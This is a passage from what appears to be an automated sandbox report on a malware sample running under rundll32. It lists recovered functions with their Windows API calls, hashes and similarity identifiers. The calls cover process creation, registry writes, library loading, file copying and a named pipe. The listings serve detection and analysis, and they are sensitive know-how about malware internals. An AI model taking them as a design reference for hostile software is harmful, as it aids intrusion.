                                            • Instruction Fuzzy Hash: 2741D071208306AFDB60EF288C45B2BBFE8BF44601F045819FD96DB291DB74ED058B62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580B968 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 121processstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.NTDLL ref: 0580B97D
                                              • Part of subcall function 0580ADF8: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0581A2DC,?,00000000,-00000007,0581377E,-00000007,?,00000000), ref: 0580AE07
                                              • Part of subcall function 0580ADF8: mbstowcs.NTDLL ref: 0580AE23
                                            • lstrlenW.KERNEL32(00000000,00000000,00000000,773EDBB0,00000020,00000000), ref: 0580B9B6
                                            • wcstombs.NTDLL ref: 0580B9C0
                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,773EDBB0,00000020,00000000), ref: 0580B9F1
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA1D
                                            • TerminateProcess.KERNEL32(?,000003E5), ref: 0580BA33
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,0580B8C3), ref: 0580BA47
                                            • GetLastError.KERNEL32 ref: 0580BA4B
                                            • GetExitCodeProcess.KERNEL32(?,00000001), ref: 0580BA6B
                                            • CloseHandle.KERNEL32(?), ref: 0580BA7A
                                            • CloseHandle.KERNEL32(?), ref: 0580BA7F
                                            • GetLastError.KERNEL32 ref: 0580BA83
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                            • String ID: D
                                            • API String ID: 2463014471-2746444292
                                            • Opcode ID: fe732e46dfd72efed87d9d686d5c0a2f155b77d4c78888b46144f6ef68cd6833
                                            • Instruction ID: bbc57575bb6279f42748418fd3310406e24d07b546d228bf31b7109bd248e865
                                            • Opcode Fuzzy Hash: fe732e46dfd72efed87d9d686d5c0a2f155b77d4c78888b46144f6ef68cd6833
                                            • Instruction Fuzzy Hash: D4411A72A01218BFDF51EFA4CD859AEBFBDFB08205F105069F901B2190EA319E448B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580AE4A Relevance: 21.2, APIs: 14, Instructions: 201memorystringthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • StrChrA.SHLWAPI(?,0000002C), ref: 0580AE99
                                            • StrTrimA.SHLWAPI(00000001,?), ref: 0580AEB2
                                            • StrChrA.SHLWAPI(?,0000002C), ref: 0580AEBD
                                            • StrTrimA.SHLWAPI(00000001,?), ref: 0580AED6
                                            • lstrlen.KERNEL32(?,00000001,?,?), ref: 0580AF6E
                                            • RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 0580AF90
                                            • lstrcpy.KERNEL32(00000020,?), ref: 0580AFAF
                                            • lstrlen.KERNEL32(?), ref: 0580AFB9
                                            • memcpy.NTDLL(?,?,?), ref: 0580AFFA
                                            • memcpy.NTDLL(?,?,?), ref: 0580B00D
                                            • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 0580B031
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 0580B050
                                            • HeapFree.KERNEL32(00000000,?,00000001,?,?), ref: 0580B076
                                            • HeapFree.KERNEL32(00000000,00000001,00000001,?,?), ref: 0580B092
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                            • String ID:
                                            • API String ID: 3323474148-0
                                            • Opcode ID: 087882c0caf7233365698a6b76104e02708a3d8aa11f145b2f5b305b5f966b25
                                            • Instruction ID: 56b68f5f9c397b821fa925764447018ca0c449acfca7e0ab6d67586961da60ed
                                            • Opcode Fuzzy Hash: 087882c0caf7233365698a6b76104e02708a3d8aa11f145b2f5b305b5f966b25
                                            • Instruction Fuzzy Hash: 1E717C71508345AFDB61DF29CC45A5BBFE9BB48304F04892EFD9AD3290D731E9848B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580CB7A Relevance: 21.2, APIs: 14, Instructions: 161memorystringfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(?), ref: 0580CB91
                                            • lstrlen.KERNEL32(?), ref: 0580CB98
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580CBAF
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0580CBC0
                                            • lstrcat.KERNEL32(?,?), ref: 0580CBDC
                                            • lstrcat.KERNEL32(?,?), ref: 0580CBED
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580CBFE
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580CC9B
                                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0580CCD4
                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0580CCED
                                            • CloseHandle.KERNEL32(00000000), ref: 0580CCF7
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580CD07
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580CD20
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580CD30
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                            • String ID:
                                            • API String ID: 333890978-0
                                            • Opcode ID: 84fd823f538d558bbdecc17d4a45a007c442b12a2acd2b04a1a753869e1c728b
                                            • Instruction ID: 8540429bfed0c0ab322971cca5b01b6794b3fe4aa8966160da201fa718f7b74f
                                            • Opcode Fuzzy Hash: 84fd823f538d558bbdecc17d4a45a007c442b12a2acd2b04a1a753869e1c728b
                                            • Instruction Fuzzy Hash: DE516C76410108BFDF219FA4DC85CAEBFBDFF48254B158426FE0697160DA31AD868F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580760F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 128timeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wsprintfA.USER32 ref: 05807651
                                            • OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 05807664
                                            • CloseHandle.KERNEL32(00000000), ref: 0580777C
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • memset.NTDLL ref: 05807687
                                            • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 05807706
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0580771B
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 05807733
                                            • GetLastError.KERNEL32(0581BC40,?,?,?,?,?,?,?,00000040), ref: 0580774B
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 05807757
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 05807766
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                            • String ID: 0x%08X$W
                                            • API String ID: 1559661116-2600449260
                                            • Opcode ID: 6805654382146b4b08ef50c424501d40c9b9a99773a2b892e0c4925cac653a8c
                                            • Instruction ID: cd0637c703361a13fa9dff53a869951c9410eccf6c815e02888f50e16480a25e
                                            • Opcode Fuzzy Hash: 6805654382146b4b08ef50c424501d40c9b9a99773a2b892e0c4925cac653a8c
                                            • Instruction Fuzzy Hash: 7D415DB5900309AFDB60DFA4C885AAABFF8FF08344F108529F959D7290D770AA54CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05810F11 Relevance: 21.1, APIs: 14, Instructions: 109libraryloaderstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,00000000,?,?,?,0580CE9C,?,?), ref: 05810F1E
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0580CE9C,?,?), ref: 05810F47
                                            • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 05810F67
                                            • lstrcpyW.KERNEL32(-00000002,?), ref: 05810F83
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0580CE9C,?,?), ref: 05810F8F
                                            • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0580CE9C,?,?), ref: 05810F92
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0580CE9C,?,?), ref: 05810F9E
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05810FBB
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05810FD5
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05810FEB
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05811001
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05811017
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0581102D
                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,0580CE9C,?,?), ref: 05811056
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                            • String ID:
                                            • API String ID: 3772355505-0
                                            • Opcode ID: b1c31e7a69648bfd58783b933e69861dc659970d07665ebb29913e36aff3bbe6
                                            • Instruction ID: ec0d0ca4aba8b684f68af4b6c399d9805b72d9341f8ced9e7e5a84bbd598f913
                                            • Opcode Fuzzy Hash: b1c31e7a69648bfd58783b933e69861dc659970d07665ebb29913e36aff3bbe6
                                            • Instruction Fuzzy Hash: 52310CB161520AAFEB20AF65DC899667FECEF04355B048426FD06C7251DB36EC44CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05804D28 Relevance: 21.1, APIs: 14, Instructions: 82stringmemoryfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804D3F
                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804D4A
                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804D52
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05804D67
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 05804D78
                                            • lstrcatW.KERNEL32(00000000,?), ref: 05804D8A
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804D8F
                                            • lstrcatW.KERNEL32(00000000,058243E0), ref: 05804D9B
                                            • lstrcatW.KERNEL32(00000000), ref: 05804DA4
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804DA9
                                            • lstrcatW.KERNEL32(00000000,058243E0), ref: 05804DB5
                                            • lstrcatW.KERNEL32(00000000,00000002), ref: 05804DD1
                                            • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804DD9
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804DE7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                            • String ID:
                                            • API String ID: 3635185113-0
                                            • Opcode ID: 9f17812794751fee904c00263838a9e2ed8b9e55556b9bdb03b80103feccd9f8
                                            • Instruction ID: bb7d54af529b500ff5100dc7a2bb50ed59230ca13a80edc13456e1e3ffbf5088
                                            • Opcode Fuzzy Hash: 9f17812794751fee904c00263838a9e2ed8b9e55556b9bdb03b80103feccd9f8
                                            • Instruction Fuzzy Hash: 6321C232251215BFDA716B64EC86E7FBFB8EF85B54F01401EFE0592160CF20AC469A76
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580BBF2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 110librarymemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC12
                                            • TlsAlloc.KERNEL32 ref: 0580BC1C
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC45
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC53
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC61
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC6F
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC7D
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC8B
                                            • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 0580BCB5
                                            • HeapFree.KERNEL32(00000000,?,?,?,0000000C,00000000), ref: 0580BD36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load$Library$AllocDll@4FreeHeapImports
                                            • String ID: ~
                                            • API String ID: 1792504554-1707062198
                                            • Opcode ID: 9cd3aba8f1c788ddddce8f7ac3251b4d53008164070f1ca86ff252f9a7553e25
                                            • Instruction ID: 25d8f99ed810a3b2f815e9ef5bcac9e8334151e8fb44771055c196f73a86398f
                                            • Opcode Fuzzy Hash: 9cd3aba8f1c788ddddce8f7ac3251b4d53008164070f1ca86ff252f9a7553e25
                                            • Instruction Fuzzy Hash: 2F417C71A10218AFDB60EFA9D88ADAD7FE9BB08210F148466ED05D7240CA79AD85CB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0581B262 Relevance: 18.2, APIs: 12, Instructions: 196memorystringthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0580984B: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05809890
                                              • Part of subcall function 0580984B: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 058098A8
                                              • Part of subcall function 0580984B: WaitForSingleObject.KERNEL32(00000000,?,00000000,?), ref: 05809970
                                              • Part of subcall function 0580984B: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05809999
                                              • Part of subcall function 0580984B: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 058099A9
                                              • Part of subcall function 0580984B: RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 058099B2
                                            • lstrcmp.KERNEL32(?,?), ref: 0581B2D9
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581B305
                                            • GetCurrentThreadId.KERNEL32 ref: 0581B3B6
                                            • GetCurrentThread.KERNEL32 ref: 0581B3C7
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,Function_0000121A,?,00000001), ref: 0581B404
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,Function_0000121A,?,00000001), ref: 0581B418
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0581B426
                                            • wsprintfA.USER32 ref: 0581B43E
                                              • Part of subcall function 05815B7E: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,05814325,00000000,00000000,00000000,00000000,00000000,?,0580479A,00000000,00000000,00000000,00000000), ref: 05815B88
                                              • Part of subcall function 05815B7E: lstrcpy.KERNEL32(00000000,00000000), ref: 05815BAC
                                              • Part of subcall function 05815B7E: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0580479A,00000000,00000000,00000000,00000000), ref: 05815BB3
                                              • Part of subcall function 05815B7E: lstrcat.KERNEL32(00000000,?), ref: 05815C0A
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0581B449
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0581B460
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0581B471
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581B47D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                            • String ID:
                                            • API String ID: 773763258-0
                                            • Opcode ID: 57459daec55b7d60a8e6dd442dfa8b8554596024886871a2187fee593f752860
                                            • Instruction ID: 9c2dda57dd0531edfa2ca881fdc62d76adf0bdd5a2d219ef9f9a8efaa087f8ad
                                            • Opcode Fuzzy Hash: 57459daec55b7d60a8e6dd442dfa8b8554596024886871a2187fee593f752860
                                            • Instruction Fuzzy Hash: 7B71EF71910219EFDB21DFA6D889DEEBFB9FB08211F008055FD05E7220DB30A995DB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05817785 Relevance: 18.1, APIs: 12, Instructions: 136stringmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 0581779B
                                            • lstrlen.KERNEL32(?), ref: 058177A3
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 058177B3
                                            • lstrcpy.KERNEL32(00000000,?), ref: 058177D2
                                            • lstrlen.KERNEL32(?), ref: 058177E7
                                            • lstrlen.KERNEL32(?), ref: 058177F5
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 05817843
                                            • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 05817867
                                            • lstrlen.KERNEL32(?), ref: 0581789A
                                            • HeapFree.KERNEL32(00000000,?,?), ref: 058178C5
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 058178DC
                                            • HeapFree.KERNEL32(00000000,?,?), ref: 058178E9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                            • String ID:
                                            • API String ID: 904523553-0
                                            • Opcode ID: e6cebdf1911b451bc1c2b8e9aa572732b0a3b4ee5fd0abe319557b8092479388
                                            • Instruction ID: 58e5b40de808ae0b2336cce09d56607fd1ef2ed70d1ad20f39b68e5e22c75110
                                            • Opcode Fuzzy Hash: e6cebdf1911b451bc1c2b8e9aa572732b0a3b4ee5fd0abe319557b8092479388
                                            • Instruction Fuzzy Hash: BD41597190024AABDF229FA4CC85AAE7FBAFB44310F10846AFD15D7150DB30AD51DB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0580C7AE Relevance: 18.1, APIs: 12, Instructions: 104synchronizationpipethreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0580C7E0
                                            • WaitForSingleObject.KERNEL32(00000598,00000000), ref: 0580C802
                                            • ConnectNamedPipe.KERNEL32(?,?), ref: 0580C822
                                            • GetLastError.KERNEL32 ref: 0580C82C
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0580C850
                                            • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 0580C893
                                            • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 0580C89C
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0580C8A5
                                            • CloseHandle.KERNEL32(?), ref: 0580C8BA
                                            • GetLastError.KERNEL32 ref: 0580C8C7
                                            • CloseHandle.KERNEL32(?), ref: 0580C8D4
                                            • RtlExitUserThread.NTDLL(000000FF), ref: 0580C8EA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                            • String ID:
                                            • API String ID: 4053378866-0
                                            • Opcode ID: b187b0cd42604ab1af204847e808ba16c23be55b61fa8fb781d8890c9607da84
                                            • Instruction ID: 989b83594c87e7c731126a1439768b3408f0a011a25f97b75da6774994932b06
                                            • Opcode Fuzzy Hash: b187b0cd42604ab1af204847e808ba16c23be55b61fa8fb781d8890c9607da84
                                            • Instruction Fuzzy Hash: 38319171414304AFDB509F64DC8A96ABFA9FB44314F008A29FD65D21E0DB70AD458FA7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05812036 Relevance: 18.1, APIs: 12, Instructions: 95registrymemorystringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlImageNtHeader.NTDLL(?), ref: 05812047
                                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,05820300,00000094,00000000,00000000,?), ref: 0581205F
                                            • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0581206E
                                            • GetTempPathA.KERNEL32(00000001,00000000,?,?,05820300,00000094,00000000,00000000,?), ref: 05812081
                                            • GetTickCount.KERNEL32 ref: 05812085
                                            • wsprintfA.USER32 ref: 0581209C
                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 058120D7
                                            • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 058120F7
                                            • lstrlen.KERNEL32(00000000), ref: 05812101
                                            • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 05812111
                                            • RegCloseKey.ADVAPI32(?), ref: 0581211D
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 0581212B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                            • String ID:
                                            • API String ID: 3778301466-0
                                            • Opcode ID: c71b80a0a67646a554ff5642abed485645eeeb87b53b050c6ec0116f3bed5f76
                                            • Instruction ID: 8efeae508cc288d76d081ed0b96f4763b0e36de02765e7ac82d75fff94dbee42
                                            • Opcode Fuzzy Hash: c71b80a0a67646a554ff5642abed485645eeeb87b53b050c6ec0116f3bed5f76
                                            • Instruction Fuzzy Hash: F9314A75511218BFDF21AFA2DC89DAF3FADEF45365B108015FD06C6110DA71AE918FA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 058115AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memorythreadstringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlImageNtHeader.NTDLL(00000000), ref: 058115D4
                                            • GetCurrentThreadId.KERNEL32 ref: 058115EA
                                            • GetCurrentThread.KERNEL32 ref: 058115FB
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                              • Part of subcall function 05814309: lstrlen.KERNEL32(00000000,00000001,00000000,?,?,00000001,00000000,00000000,00000000,00000000,?,0580479A,00000000,00000000,00000000,00000000), ref: 05814374
                                              • Part of subcall function 05814309: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000001,00000000,00000000,00000000,00000000,?,0580479A,00000000,00000000,00000000,00000000), ref: 0581439C
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 05811675
                                            • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 05811681
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 058116D0
                                            • wsprintfA.USER32 ref: 058116E8
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 058116F3
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0581170A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                            • String ID: W
                                            • API String ID: 630447368-655174618
                                            • Opcode ID: b324613d9e3643748d30d44cc04310634ecc99f209ca34a431214fa26a27c307
                                            • Instruction ID: 8e3679779047d5149f65c01b57333c56c89dbb2b32dc4b3924beacfe6e020b48
                                            • Opcode Fuzzy Hash: b324613d9e3643748d30d44cc04310634ecc99f209ca34a431214fa26a27c307
                                            • Instruction Fuzzy Hash: 12413971A00218ABDF21DFA6DC49DAE7FB9FF14750F048015FD05D2160DB35AA90DBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 05803F20 Relevance: 16.7, APIs: 11, Instructions: 157registrystringfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05803F4B
                                              • Part of subcall function 0580B0A5: RegCloseKey.ADVAPI32(?), ref: 0580B12C
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05803F86
                                            • lstrcpyW.KERNEL32(-00000002,?), ref: 05803FE8
                                            • lstrcatW.KERNEL32(00000000,?), ref: 05803FFD
                                            • lstrcpyW.KERNEL32(?), ref: 05804017
                                            • lstrcatW.KERNEL32(00000000,?), ref: 05804026
                                              • Part of subcall function 0580E793: lstrlenW.KERNEL32(?,00000000,?,05804045,00000000,?), ref: 0580E7A6
                                              • Part of subcall function 0580E793: lstrlen.KERNEL32(?,?,05804045,00000000,?), ref: 0580E7B1
                                              • Part of subcall function 0580E793: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0580E7C6
                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 05804090
                                              • Part of subcall function 05815F3B: lstrlenW.KERNEL32(?,73E806E0,05822F1B,80000001,?,?,0580C229,?,?,058040AD,00000000,?,00000000,?), ref: 05815F47
                                              • Part of subcall function 05815F3B: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,0580C229,?,?,058040AD,00000000,?,00000000,?), ref: 05815F6F
                                              • Part of subcall function 05815F3B: memset.NTDLL ref: 05815F81
                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?), ref: 058040C5
                                            • GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 058040D0
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058040E6
                                            • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 058040F8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
